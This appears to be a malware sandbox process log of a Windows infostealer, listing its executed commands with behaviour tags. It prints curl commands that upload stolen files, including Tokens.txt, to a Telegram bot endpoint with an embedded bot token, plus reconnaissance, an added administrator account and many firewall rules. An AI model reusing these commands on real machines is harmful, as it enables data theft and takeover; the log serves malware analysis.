C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >C:\Users\Admin\apps.txt"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\curl.execurl -v -F document=@C:\Users\Admin\apps.txt https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-6556825383⤵
-
C:\Windows\system32\ipconfig.exeipconfig3⤵
- Gathers network information
-
C:\Windows\system32\getmac.exegetmac3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get caption, name, deviceid, numberofcores, maxclockspeed, status3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic partition get name,size,type3⤵
-
C:\Windows\system32\systeminfo.exesysteminfo3⤵
- Gathers system information
-
C:\Windows\System32\Wbem\WMIC.exewmic path softwarelicensingservice get OA3xOriginalProductKey3⤵
-
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\curl.execurl -v -F document=@C:\Users\Admin\userdata.txt https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-6556825383⤵
-
C:\Windows\system32\curl.execurl -v -F document=@"Tokens.txt" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-6556825383⤵
-
C:\Windows\system32\curl.execurl -v -F document=@"Tokens.txt" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-6556825383⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
- Adds Run key to start application
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
- Executes dropped EXE
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32060" dir=out action=allow protocol=UDP localport=126273⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 32587" dir=in action=allow protocol=UDP localport=94153⤵
-
